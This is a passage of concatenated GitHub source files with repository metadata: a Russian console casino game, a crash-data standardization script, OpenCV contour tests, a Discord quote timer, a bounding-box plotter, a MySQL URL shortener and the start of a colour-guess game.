mainTime = 0\n number = random.randint(0, 38)\n increaseTickTime = random.randint(100, 110) / 100\n col = 1\n\n while mainTime < 0.7:\n col += 1\n if col > 15:\n col = 1\n\n mainTime += tickTime\n tickTime *= increaseTickTime\n\n color(col)\n number += 1\n if number > 38:\n number = 0\n print()\n printNumber = number\n if number == 37:\n printNumber = \"00\"\n elif number == 38:\n printNumber = \"000\"\n\n print(\" Число >\",\n printNumber,\n \"*\" * number,\n \" \" * (79 - number * 2),\n \"*\" * number)\n\n if visable:\n time.sleep(mainTime)\n return number\n\n# Анимация костей\ndef getDice():\n count = random.randint(3, 8)\n sleep = 0\n while count > 0:\n color(count + 7)\n x = random.randint(1, 6)\n y = random.randint(1, 6)\n print(\" \" * 10, \"----- -----\")\n print(\" \" * 10, f\"| {x} | | {y} |\")\n print(\" \" * 10, \"----- -----\")\n time.sleep(sleep)\n sleep += 1 / count\n count -= 1\n return x + y\n\n# Подсчет однорукого бандита\ndef getMaxCount(digit, v1, v2, v3, v4, v5):\n ret = 0\n if digit == v1:\n ret += 1\n if digit == v2:\n ret += 1\n if digit == v3:\n ret += 1\n if digit == v4:\n ret += 1\n if digit == v5:\n ret += 1\n return ret\n\n# Анимация однорукого бандита\ndef getOHBRes(stavka):\n res = stavka\n d1 = 0\n d2 = 0\n d3 = 0\n d4 = 0\n d5 = 0\n\n get_d1 = True\n get_d2 = True\n get_d3 = True\n get_d4 = True\n get_d5 = True\n col = 10\n\n while get_d1 or get_d2 or get_d3 or get_d4 or get_d5:\n if get_d1:\n d1 += 1\n if get_d2:\n d2 -= 1\n if get_d3:\n d3 += 1\n if get_d4:\n d4 -= 1\n if get_d5:\n d5 += 1\n\n if d1 > 9:\n d1 = 0\n if d2 < 0:\n d2 = 9\n if d3 > 9:\n d3 = 0\n if d4 < 0:\n d4 = 9\n if d5 > 9:\n d5 = 0\n\n if random.randint(0, 20) == 1:\n get_d1 = False\n if random.randint(0, 20) == 1:\n get_d2 = False\n if random.randint(0, 20) == 1:\n get_d3 = False\n if random.randint(0, 20) == 1:\n get_d4 = False\n if random.randint(0, 20) == 1:\n get_d5 = False\n\n time.sleep(0.1)\n color(col)\n col += 1\n if col > 15:\n col = 10\n\n print(\" \" + \"%\" * 10)\n print(f\" {d1} {d2} {d3} {d4} {d5}\")\n\n max_count = getMaxCount(d1, d1, d2, d3, d4, d5)\n if max_count < getMaxCount(d2, d1, d2, d3, d4, d5):\n max_count = getMaxCount(d2, d1, d2, d3, d4, d5)\n if max_count < getMaxCount(d3, d1, d2, d3, d4, d5):\n max_count = getMaxCount(d3, d1, d2, d3, d4, d5)\n if max_count < getMaxCount(d4, d1, d2, d3, d4, d5):\n max_count = getMaxCount(d4, d1, d2, d3, d4, d5)\n if max_count < getMaxCount(d5, d1, d2, d3, d4, d5):\n max_count = getMaxCount(d5, d1, d2, d3, d4, d5)\n\n color(14)\n if max_count == 2:\n print(f\" Совпадение двух чисел! Твой выигрыш в размере ставки: {res} {valuta}.\")\n elif max_count == 3:\n res *= 2\n print(f\" Совпадение трех чисел! Твой выигрыш 2:1: {res} {valuta}.\")\n elif max_count == 4:\n res *= 5\n print(f\" Совпадение четырех чисел! Твой выигрыш 5:1: {res} {valuta}.\")\n elif max_count == 5:\n res *= 10\n print(f\" БИНГО! Совпадение всех чисел! Твой выигрыш 10:1: {res} {valuta}.\")\n else:\n loss(res)\n res = 0\n\n color(11)\n print()\n input(\" Нажмите Enter для продолжения...\")\n\n return res\n\n# ================================================================================\n\n# Рулетка\ndef roulette():\n global money\n playGame = True\n while playGame and money > 0:\n colorLine(3, \"ДОБРО ПОЖАЛОВАТЬ НА ИГРУ В РУЛЕТКУ\")\n color(14)\n print(f\"\\n У тебя на счету {money} {valuta}.\\n\")\n color(11)\n print(\" Ставлю на ...\")\n print(\" 1. Четное (выигрыш 1:1)\")\n print(\" 2. Нечетное (выигрыш 1:1)\")\n print(\" 3. Дюжина (выигрыш 3:1)\")\n print(\" 4. Число (выигрыш 36:1\")\n print(\" 0. Возврат в меню\\n\")\n\n x = getInput(\"01234\", \" Твой выбор? \")\n play_roulette = True\n\n if x == \"3\":\n color(2)\n print()\n print(\" Выбери диапозон:...\")\n print(\" 1. От 0 до 12\")\n print(\" 2. От 13 до 24\")\n print(\" 3. От 25 до 36\")\n print(\" 0. Назад\\n\")\n\n duzhina = getInput(\"0123\", \" Твой выбор? \")\n\n if duzhina == \"1\":\n text_duzhina = \"от 0 до 12\"\n elif duzhina == \"2\":\n text_duzhina = \"от 13 до 24\"\n elif duzhina == \"3\":\n text_duzhina = \"от 25 до 36\"\n elif duzhina == \"0\":\n play_roulette = False\n\n elif x == \"4\":\n chislo = getIntInput(0, 36, \" На какое число ставишь (0..36)? \")\n\n color(7)\n if x == \"0\":\n return 0\n\n if play_roulette:\n stavka = getIntInput(0, money, f\" Сколько поставишь (не больше {money} {valuta})? \")\n if stavka == 0:\n return 0\n\n number = getRoulette(True)\n\n if x == \"1\":\n print(\" Ты поставил на ЧЕТНОЕ!\")\n if number < 37 and number % 2 == 0:\n money += stavka\n win(stavka)\n else:\n money -= stavka\n loss(stavka)\n elif x == \"2\":\n print(\" Ты поставил на НЕЧЕТНОЕ!\")\n if number < 37 and number % 2 != 0:\n money += stavka\n win(stavka)\n else:\n money -= stavka\n loss(stavka)\n elif x == \"3\":\n print(f\" Ставка сделана на диапазон чисел {text_duzhina}.\")\n winDuzhina = \"\"\n if number < 13:\n winDuzhina = \"1\"\n elif 12 < number < 25:\n winDuzhina = \"2\"\n elif number > 24:\n winDuzhina = \"3\"\n\n if duzhina == winDuzhina:\n money += stavka * 2\n win(stavka * 3)\n else:\n money -= stavka\n loss(stavka)\n elif x == \"4\":\n print(f\" Ставка сделана на число {chislo}.\")\n if number == chislo:\n money += stavka * 35\n win(stavka * 36)\n else:\n money -= stavka\n loss(stavka)\n\n print()\n input(\" Нажмите Enter для продолжения...\")\n\n# Кости\ndef dice():\n global money\n playGame = True\n\n while playGame:\n print()\n colorLine(3, \"ДОБРО ПОЖАЛОВАТЬ НА ИГРУ В КОСТИ!\")\n color(14)\n print(f\"\\n У тебя на счету {money} {valuta}.\")\n\n color(7)\n stavka = getIntInput(0, money, f\" Сделай ставку в пределах {money} {valuta}: \")\n if stavka == 0:\n return 0\n\n playRound = True\n control = stavka\n oldResult = getDice()\n firstPlay = True\n\n while playRound and stavka > 0 and money > 0:\n if stavka > money:\n stavka = money\n color(11)\n print(f\"\\n В твоем распоряжении {stavka} {valuta}.\")\n color(12)\n print(f\"\\n Текущая сумма чисел на костях: {oldResult}.\")\n color(11)\n print(\"\\n Сумма чисел на гранях будет больше, меньше или равна предыдущей?\")\n color(7)\n x = getInput(\"0123\", \" Введите 1 - больше, 2 - меньше, 3 - равна или 0 - выход: \")\n\n if x != \"0\":\n firstPlay = False\n if stavka > money:\n stavka = money\n\n money -= stavka\n diceResult = getDice()\n\n win = False\n if (oldResult > diceResult and x == \"2\") or (oldResult < diceResult and x == \"1\"):\n win = True\n\n if not x == \"3\":\n if win:\n money += stavka + stavka // 5\n color(14)\n print(f\" Победа за тобой! *Ведьмаку заплатите чеканной монетой*: {stavka // 5} {valuta}\")\n stavka += stavka // 5\n else:\n stavka = control\n loss(stavka)\n elif x == \"3\":\n if oldResult == diceResult:\n money += stavka * 3\n win(stavka * 3)\n stavka *= 3\n else:\n stavka = control\n loss(stavka)\n\n oldResult = diceResult\n\n else:\n if firstPlay:\n money -= stavka\n playRound = False\n\n# Однорукий бандит\ndef one_hand_bandit():\n global money\n playGame = True\n\n while playGame:\n colorLine(3, \"ДОБРО ПОЖАЛОВАТЬ НА ИГРУ В ОДНОРУКОГО БАНДИТА!\")\n color(14)\n print(f\"\\n У тебя на счету {money} {valuta}.\\n\")\n color(5)\n print(\" Правила игры:\")\n print(\" 1. При совпадении 2-х чисел ставка не списывается.\")\n print(\" 2. При совпадении 3-х чисел выигрыш 2:1.\")\n print(\" 3. При совпадении 4-х чисел выигрыш 5:1.\")\n print(\" 4. При совпадении 5-ти чисел выигрыш 10:1.\")\n print(\" 5. Ставка 0 для завершении игры.\\n\")\n\n stavka = getIntInput(0, money, f\" Введите ставку от 0 до {money} {valuta}: \")\n\n if stavka == 0:\n return 0\n\n money -= stavka\n money += getOHBRes(stavka)\n\n if (money <= 0):\n playGame = False\n\n\n# ================================================================================\n# ================================================================================\n\nmain()","repo_name":"ThisISky/learning","sub_path":"Casino [learn ver].py","file_name":"Casino [learn ver].py","file_ext":"py","file_size_in_byte":15971,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29983682087","text":"# Standardize a crashes CSV into compatible JSON document.\n# Author terryf82 https://github.com/terryf82\n\nimport argparse\nimport os\nimport pandas as pd\nfrom collections import OrderedDict\nimport csv\nimport calendar\nimport random\nimport dateutil.parser as date_parser\nfrom .standardization_util import parse_date, validate_and_write_schema\nfrom data.geocoding_util import read_geocode_cache\nimport data.config\n\nCURR_FP = os.path.dirname(\n os.path.abspath(__file__))\nBASE_FP = os.path.dirname(os.path.dirname(CURR_FP))\n\ndef validate_coords(crash: dict, lat_field: str, lon_field: str):\n \"\"\"\n Validates latitude/longitude values, returns numeric values\n Args:\n crash: crash data\n lat_field: lat field name\n lon_field: lon field name\n Returns: tuple of float values or None, if invalid\n \"\"\"\n if lat_field and lon_field:\n try:\n # if strings, try and convert\n lat = float(crash[lat_field])\n lon = float(crash[lon_field])\n except ValueError:\n return\n if abs(lat) > 90:\n return\n if abs(lon) > 180:\n return\n return lat, lon\n\n\n\n\ndef read_standardized_fields(raw_crashes: dict, fields: dict, opt_fields: dict,\n timezone: str, datadir: str, city: str,\n startdate=None, enddate=None) -> dict:\n\n crashes = {}\n # Drop times from startdate/enddate in the unlikely event\n # they're passed in\n if startdate:\n startdate = parse_date(startdate, timezone)\n startdate = date_parser.parse(startdate).date()\n if enddate:\n enddate = parse_date(enddate, timezone)\n enddate = date_parser.parse(enddate).date()\n\n min_date = None\n max_date = None\n \n cached_addresses = {}\n\n if (not fields['latitude'] or not fields['longitude']):\n if 'address' in opt_fields and opt_fields['address']:\n # load cache for geocode lookup\n geocoded_file = os.path.join(\n datadir, 'processed', 'geocoded_addresses.csv')\n if os.path.exists(geocoded_file):\n cached_addresses = read_geocode_cache(\n filename=os.path.join(\n datadir, 'processed', 'geocoded_addresses.csv'))\n else:\n\n raise SystemExit(\n \"Need to geocode addresses before standardizing crashes\")\n else:\n raise SystemExit(\n \"Can't standardize crash data, no lat/lon or address found\"\n )\n\n no_geocoded_count = 0\n for i, crash in enumerate(raw_crashes):\n if i % 10000 == 0:\n print(i)\n\n lat_lon = validate_coords(crash, fields['latitude'], fields['longitude'])\n if lat_lon:\n lat, lon = lat_lon\n\n else:\n # skip any crashes that don't have coordinates\n if 'address' not in opt_fields or opt_fields['address'] not in crash:\n continue\n\n address = crash[opt_fields['address']] + ' ' + city\n\n # If we have an address, look it up in the geocoded cache\n if address in cached_addresses:\n address, lat, lon, _ = cached_addresses[address]\n if not address:\n no_geocoded_count += 1\n continue\n else:\n no_geocoded_count += 1\n continue\n\n # construct crash date based on config settings, skipping any crashes without date\n if fields[\"date_complete\"]:\n if not crash[fields[\"date_complete\"]]:\n continue\n\n else:\n crash_date = crash[fields[\"date_complete\"]]\n\n elif fields[\"date_year\"]:\n # TODO: generally, we don't need date anymore, we should remove it\n # for now, month is always january if unspecified\n date_month = 1\n date_year = int(crash[fields[\"date_year\"]])\n if fields[\"date_month\"]:\n date_month = int(crash[fields[\"date_month\"]])\n if fields[\"date_day\"]:\n crash_date = f'{date_year}-{date_month}-{crash[fields[\"date_day\"]]}'\n # some cities do not supply a day of month for crashes, randomize if so\n else:\n available_dates = calendar.Calendar().itermonthdates(\n date_year, date_month)\n crash_date = str(random.choice(\n [date for date in available_dates if date.month == date_month]))\n # skip any crashes that don't have a date\n else:\n continue\n\n crash_time = None\n if fields[\"time\"]:\n crash_time = crash[fields[\"time\"]]\n\n if fields[\"time_format\"]:\n crash_date_time = parse_date(\n crash_date,\n timezone,\n crash_time,\n fields[\"time_format\"]\n )\n\n else:\n crash_date_time = parse_date(\n crash_date,\n timezone,\n crash_time\n )\n\n # Skip crashes where date can't be parsed\n if not crash_date_time:\n continue\n\n crash_day = date_parser.parse(crash_date_time).date()\n # Drop crashes that occur outside of the range, if specified\n if ((startdate is not None and crash_day < startdate) or\n (enddate is not None and crash_day > enddate)):\n\n continue\n if min_date is None or crash_day < min_date:\n min_date = crash_day\n if max_date is None or crash_day > max_date:\n max_date = crash_day\n\n formatted_crash = OrderedDict([\n (\"id\", crash[fields[\"id\"]]),\n (\"dateOccurred\", crash_date_time),\n (\"location\", OrderedDict([\n (\"latitude\", float(lat)),\n (\"longitude\", float(lon))\n ]))\n ])\n formatted_crash = add_city_specific_fields(crash, formatted_crash,\n opt_fields)\n crashes[formatted_crash[\"id\"]] = formatted_crash\n\n if min_date and max_date:\n print(\"Including crashes between {} and {}\".format(\n min_date.isoformat(), max_date.isoformat()))\n elif min_date:\n print(\"Including crashes after {}\".format(\n min_date.isoformat()))\n elif max_date:\n print(\"Including crashes before {}\".format(\n max_date.isoformat()))\n\n # Making sure we have enough entries with lat/lon to continue\n if len(crashes) > 0 and no_geocoded_count/len(raw_crashes) > .9:\n raise SystemExit(\"Not enough geocoded addresses found, exiting\")\n \n return crashes\n\n\ndef add_city_specific_fields(crash, formatted_crash, fields):\n\n # Add summary and address\n if \"summary\" in list(fields.keys()) and fields[\"summary\"]:\n formatted_crash[\"summary\"] = crash[fields[\"summary\"]]\n if \"address\" in list(fields.keys()) and fields[\"address\"]:\n formatted_crash[\"address\"] = crash[fields[\"address\"]]\n\n # Add all features that have been specified under split_columns\n if 'split_columns' in fields:\n formatted_crash = add_split_columns(crash, formatted_crash, fields)\n return formatted_crash\n\n\ndef add_split_columns(crash, formatted_crash, fields):\n \"\"\"\n Add any fields specified in the split_columns field of the config\n Args:\n crash - a dict of unformatted crash information\n formatted_crash - a dict with formatted crash fields\n fields - a dict of config information about the crash fields\n Returns:\n formatted_fields\n \"\"\"\n split_columns = fields['split_columns']\n\n # Negative splits are all fields that only have a positive value if none of\n # the columns specified in not_column have values, so look at these separately\n negative_splits = [x for x in split_columns if 'not_column' in split_columns[x].keys()]\n splits_dict = {}\n for key, value in split_columns.items():\n\n if key in negative_splits or 'column_value' not in value or not value['column_name']:\n continue\n\n if value['column_value'] == 'any' and crash[value['column_name']]:\n splits_dict[key] = 1\n else:\n if crash[value['column_name']] == value['column_value']:\n splits_dict[key] = 1\n\n for column in negative_splits:\n # These are the columns that can't have a value for the current column to be true\n # E.g. column is vehicle, and bike and pedestrian need to not be present in splits_dict\n compare_columns = split_columns[column]['not_column'].split()\n value = True\n\n for compare_column in compare_columns:\n if compare_column in splits_dict:\n value = False\n if value:\n splits_dict[column] = 1\n\n for key, value in splits_dict.items():\n formatted_crash[key] = value\n\n return formatted_crash\n\n\ndef add_id(csv_file, id_field):\n \"\"\"\n If the csv_file does not contain an id, create one\n \"\"\"\n\n rows = []\n with open(csv_file) as f:\n csv_reader = csv.DictReader(f)\n count = 1\n for row in csv_reader:\n if id_field in row:\n break\n row.update({id_field: count})\n rows.append(row)\n count += 1\n if rows:\n with open(csv_file, 'w') as f:\n writer = csv.DictWriter(f, list(rows[0].keys()))\n writer.writeheader()\n for row in rows:\n writer.writerow(row)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--config\", type=str, required=True,\n help=\"config file\")\n parser.add_argument(\"-d\", \"--datadir\", type=str, required=True,\n help=\"data directory\")\n\n args = parser.parse_args()\n\n # load config\n config_file = args.config\n config = data.config.Configuration(config_file)\n\n crash_dir = os.path.join(args.datadir, \"raw/crashes\")\n if not os.path.exists(crash_dir):\n raise SystemExit(crash_dir + \" not found, exiting\")\n\n print(\"searching \"+crash_dir+\" for raw files:\")\n dict_crashes = {}\n\n for csv_file, csv_config in config.crashes_files.items():\n if not os.path.exists(os.path.join(crash_dir, csv_file)):\n raise SystemExit(os.path.join(\n crash_dir, csv_file) + \" not found, exiting\")\n\n add_id(\n os.path.join(crash_dir, csv_file), csv_config['required']['id'])\n\n print(\"processing {}\".format(csv_file))\n\n df_crashes = pd.read_csv(os.path.join(\n crash_dir, csv_file), na_filter=False)\n raw_crashes = df_crashes.to_dict(\"records\")\n\n std_crashes = read_standardized_fields(\n raw_crashes,\n csv_config['required'],\n csv_config['optional'],\n config.timezone,\n args.datadir,\n config.city,\n config.startdate,\n config.enddate\n )\n\n print(\"{} crashes loaded with standardized fields, checking for specific fields\".format(\n len(std_crashes)))\n dict_crashes.update(std_crashes)\n\n print(\"{} crashes loaded, validating against schema\".format(len(dict_crashes)))\n\n schema_path = os.path.join(BASE_FP, \"standards\", \"crashes-schema.json\")\n list_crashes = list(dict_crashes.values())\n crashes_output = os.path.join(args.datadir, \"standardized/crashes.json\")\n validate_and_write_schema(schema_path, list_crashes, crashes_output)\n","repo_name":"insight-lane/crash-model","sub_path":"src/data_standardization/standardize_crashes.py","file_name":"standardize_crashes.py","file_ext":"py","file_size_in_byte":11551,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"31"} +{"seq_id":"42073462237","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport imutils\n#from keras.preprocessing import image as pics\n\n#------------------------------------------------------------------------------------------------------``\ndef find_contours(img): \n contours, hierarchy = cv.findContours(image=img, mode=cv.RETR_TREE, method=cv.CHAIN_APPROX_SIMPLE)\n\n # draw contours on the original image\n image_copy = img.copy()\n cv.drawContours(image=image_copy, contours=contours, contourIdx=-1, color=(0, 255, 0), thickness=2, lineType=cv.LINE_AA)\n\n # see the results\n cv.imshow('Contour Approximation', image_copy)\n cv.waitKey(0)\n cv.imwrite('contours_none_image1.jpg', image_copy)\n cv.destroyAllWindows()\n\ndef threshold_test():\n image = cv.imread(r'C:\\Users\\ducke\\parking_spots\\download.jpg')\n cv.imshow(\"Original Image\", image)\n\n ret,thresh1 = cv.threshold(image,127,255,cv.THRESH_BINARY)\n ret,thresh2 = cv.threshold(image,127,255,cv.THRESH_BINARY_INV)\n ret,thresh3 = cv.threshold(image,127,255,cv.THRESH_TRUNC)\n ret,thresh4 = cv.threshold(image,127,255,cv.THRESH_TOZERO)\n ret,thresh5 = cv.threshold(image,127,255,cv.THRESH_TOZERO_INV)\n titles = ['Original Image','BINARY','BINARY_INV','TRUNC','TOZERO','TOZERO_INV']\n images = [image, thresh1, thresh2, thresh3, thresh4, thresh5]\n for i in range(6):\n plt.subplot(2,3,i+1),plt.imshow(images[i],'gray',vmin=0,vmax=255)\n plt.title(titles[i])\n plt.xticks([]),plt.yticks([])\n plt.show()\n\ndef is_contour_bad(c):\n peri = cv.arcLength(c, True)\n approx = cv.approxPolyDP(c, 0.02 * peri, True)\n\n return not len(approx) == 4\n\n# Detects potential cars based on how circular it is, returns boolean\ndef vehicle_detector_contour(contour_length, contour_area):\n return ((contour_length**2)/ contour_area) <= 20 # to roughly circular, like a car, adjust the value as needed\n\ndef main():\n image = cv.imread(r'C:\\Users\\ducke\\parking_spots\\download.jpg')\n cv.imshow(\"Original Image\", image)\n\n grey = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n thresh = cv.adaptiveThreshold(grey, 255, cv.ADAPTIVE_THRESH_MEAN_C,\n cv.THRESH_BINARY, 199, 5)\n t2 = cv.adaptiveThreshold(grey, 255, cv.ADAPTIVE_THRESH_MEAN_C,\n cv.THRESH_BINARY, 199, 5)\n cv.imshow('Adaptive Gaussian', thresh)\n cv.imshow('Mean', t2)\n\n find_contours(thresh)\n\n\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mackenziehamlett/SpotSpotter","sub_path":"CV2/CV_test1.py","file_name":"CV_test1.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3814073749","text":"import asyncio\r\nimport utility\r\nimport commands.wb\r\nimport secret\r\n\r\n\r\nclass QuoteTimer:\r\n def __init__(self, client, server):\r\n self.client = client\r\n self.server = server\r\n self.channel = utility.getServerTimerChannel(server)\r\n self.timer = utility.getServerTimer(server.name)\r\n self.loop = asyncio.get_event_loop()\r\n\r\n def setup(self):\r\n self.startTimer()\r\n print(\"Set up QuoteTimer for \" + self.server.name + \" in #\" + self.channel.name +\r\n \" with a \" + str(self.timer) + \" second interval\")\r\n\r\n def startTimer(self):\r\n self.timer = utility.getServerTimer(self.server.name)\r\n self.loop.create_task(self.periodicWB())\r\n\r\n async def periodicWB(self):\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": start periodicWB\")\r\n await self.client.wait_until_ready()\r\n sleep_timer = self.timer\r\n if self.timer == 0:\r\n sleep_timer = 600\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": start sleep\")\r\n await asyncio.sleep(sleep_timer)\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": end sleep\")\r\n\r\n if self.timer != 0:\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Getting quote\")\r\n number_string, line = commands.wb.ex_with_params(self.server.name)\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Quote got\")\r\n if number_string:\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Getting channel\")\r\n channel = utility.getServerTimerChannel(self.server)\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Channel got\")\r\n if channel is not None:\r\n skip = False\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Getting logs\")\r\n async for msg in self.client.logs_from(channel, limit=10):\r\n if msg.author.name == secret.BOT_NAME:\r\n skip = True\r\n break\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Logs got\")\r\n if not skip:\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Sending message\")\r\n await self.client.send_message(channel, utility.wbBlock(number_string, line))\r\n print(\"QuoteTimer \" + self.server.name + \" in #\" + self.channel.name +\r\n \": Message sent\")\r\n self.startTimer()\r\n\r\n","repo_name":"sp9999/Discord","sub_path":"MagicConch/QuoteTimer.py","file_name":"QuoteTimer.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33129502673","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom utils import parse_annotation\n\n\ndef plot_box(image, bbox, save=True, show=False):\n left = int(bbox[0])\n top = int(bbox[1])\n right = int(bbox[2])\n bottom = int(bbox[3])\n\n # plot box\n cv2.rectangle(image, (left, top), (right, bottom), (0, 0, 255), 3)\n\n # show image\n if show:\n cv2.imshow('image', image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n if save:\n cv2.imwrite('data/street_bbox.jpg', image)\n\n\nif __name__ == \"__main__\":\n image_path = \"data/street.jpg\"\n annotations_path = \"data/street.xml\"\n\n # read image and get width, height\n image = cv2.imread(image_path)\n h, w, _ = image.shape\n\n # get bounding box\n bbox = parse_annotation(annotations_path)\n\n # plot boinding box and save image\n plot_box(image, bbox)\n","repo_name":"kaka-lin/ML-Notes","sub_path":"Object Detection/resize-keep-aspect-ratio/plot_box.py","file_name":"plot_box.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"38533411480","text":"import os\nimport mysql.connector\nfrom mysql.connector import errorcode\nfrom dotenv import load_dotenv\n\nload_dotenv(override=True)\n\nconfig = {\n \"host\": os.getenv(\"SERVER\"),\n \"port\": os.getenv(\"PORT\"),\n \"user\": os.getenv(\"USER\"),\n \"password\": os.getenv(\"PASSWORD\"),\n \"db\": os.getenv(\"DATABASE\"),\n \"raise_on_warnings\": True,\n}\n\ndef buscar(url_corta):\n try:\n cnx = mysql.connector.connect(**config)\n\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Algo está mal con el nombre de usuario o contraseña\")\n print(err)\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"La base de datos no existe\")\n else:\n print(err)\n\n else:\n if len(url_corta) == 5:\n cursor = cnx.cursor()\n consultilla_larga = cursor.execute(\n f\"\"\"SELECT url_large FROM equipo_a.urls WHERE url_short = \"{url_corta}\";\"\"\"\n )\n resultado_larga = cursor.fetchone()\n\n if resultado_larga is not None:\n url_larga = resultado_larga[0]\n\n cursor.close()\n cnx.close()\n\n return url_larga\n\ndef almacenar(url_corta, url_larga):\n try:\n cnx = mysql.connector.connect(**config)\n\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Algo está mal con el nombre de usuario o contraseña\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"La base de datos no existe\")\n else:\n print(err)\n\n else:\n cursor = cnx.cursor()\n q_data_guardar = f\"\"\"INSERT INTO `equipo_a`.`urls` (`url_short`, `url_large`)\n VALUES ('{url_corta}', '{url_larga}');\n \"\"\"\n cursor.execute(q_data_guardar)\n cnx.commit()\n\n cursor.close()\n cnx.close()\n","repo_name":"agusspoxe/acortador_url","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13736673888","text":"''' COLOR GUESS GAME(CGG) version 0.2\r\n------------------------------------------------------\r\n Created by Justin J. De La Cruz\r\n Game where you have to write the color of the text\r\n and not the text written.\r\n\r\n version 0.2 changes:\r\n - Included Classes\r\n - New GUI design\r\n---------------------------------------------------------\r\n'''\r\n\r\nfrom graphics import *\r\nimport random\r\nimport time\r\nimport threading\r\n\r\n# Global variables\r\n\r\ncolors = ['red','blue','green','pink','white','yellow','orange','purple']\r\ntimer = 30 #not in game\r\nscore = 0\r\n\r\nwin = GraphWin(\"Color Guess Game ver. 0.2\",350,350)\r\nwin.setCoords(0,0,500,500)\r\nwin.setBackground(\"black\")\r\n\r\nscoreText = Text(Point(250.0,480.0),\"Score: %s\" %score)\r\nscoreText.setFill(\"white\")\r\nscoreText.setSize(15)\r\nscoreText.setStyle(\"bold\")\r\nscoreText.setFace(\"courier\")\r\nscoreText.draw(win)\r\n\r\n# Classes\r\n\r\nclass GUI:\r\n ''' It displays the games window using Zelle graphics.py '''\r\n def __init(self, win):\r\n self.win = win \r\n\r\n def window(self): \r\n rectange = Rectangle(Point(20.0,100.0),Point(480.0,460.00)) \r\n rectange.setOutline(\"red\")\r\n #rectange.setFill(\"white\")\r\n rectange.draw(win)\r\n\r\n back_Circle = Circle(Point(250.0,280.0),125)\r\n back_Circle.setFill(\"light gray\")\r\n back_Circle.setOutline(\"gray\")\r\n #back_Circle.draw(win)\r\n\r\n\r\n startText = Text(Point(250.0,275.0),\"Start Game.\")\r\n startText.setFill(\"white\")\r\n startText.setFace(\"courier\")\r\n startText.setSize(30)\r\n startText.draw(win)\r\n\r\n subtitle_Text = Text(Point(250.0,85.0),\"Write the color, NOT THE TEXT!\")\r\n subtitle_Text.setFill(\"white\")\r\n subtitle_Text.setSize(13)\r\n subtitle_Text.setFace(\"courier\")\r\n subtitle_Text.setStyle(\"bold\")\r\n subtitle_Text.draw(win)\r\n\r\n while True: \r\n win.getMouse()\r\n startText.undraw()\r\n break\r\n '''\r\n timeText = Text(Point(60.0,85.0), \"Timer: %s\" %timer)\r\n timeText.draw(win)\r\n '''\r\n \r\n def ballBounce(self):\r\n ball = Circle(Point(250.0,250.0), 50)\r\n ball.setOutline(\"light gray\")\r\n ball.setFill(str(random.choice(colors)))\r\n ball.draw(win)\r\n\r\n dx = 1\r\n dy = 1\r\n\r\n while win.checkMouse():\r\n \r\n ball.move(dx,dy)\r\n \r\n\r\n if ball.getP1().getX() == 20.0 or ball.getP2().getX() == 480.0:\r\n\r\n dx = -dx\r\n ball.setFill(random.choice(colors))\r\n\r\n if ball.getP1().getY() == 100.0 or ball.getP2().getY() == 460.0:\r\n\r\n dy = -dy\r\n ball.setFill(random.choice(colors))\r\n \r\n update(100) \r\n \r\nclass Game:\r\n ''' This class has the game's main functionality '''\r\n \r\n def __init__(self):\r\n pass \r\n\r\n def entryBox(self):\r\n input = Entry(Point(250.0,50.0),25)\r\n input.setText('')\r\n input.setFill('white')\r\n input.draw(win)\r\n win.checkKey()\r\n\r\n while True:\r\n key = win.getKey()\r\n\r\n if key == \"Return\":\r\n input_Color = str(input.getText().lower())\r\n break\r\n \r\n return input_Color \r\n\r\n def countdown():\r\n ''' Timer for game '''\r\n global timer\r\n\r\n for count in range(timer, 0, -1):\r\n timer -=1\r\n timer.sleep(1)\r\n\r\n if timer == 0:\r\n print(\"TIMES UP!\")\r\n break\r\n\r\n def game_reset(self):\r\n global score\r\n global timer\r\n\r\n leaderboard_Text = Text(Point(250.0,280.0),\"Play Again?...\\n (yes or no)\")\r\n leaderboard_Text.setFill(\"white\")\r\n leaderboard_Text.setSize(16)\r\n leaderboard_Text.setFace(\"courier\")\r\n leaderboard_Text.setStyle(\"bold\")\r\n leaderboard_Text.draw(win)\r\n\r\n if (Game.entryBox(self) == 'yes'):\r\n leaderboard_Text.setText(\"Reseting...\")\r\n print(\"Game reset...\")\r\n score = 0\r\n timer = 30\r\n time.sleep(2)\r\n leaderboard_Text.setText(\"Starting...\")\r\n print(\"Starting 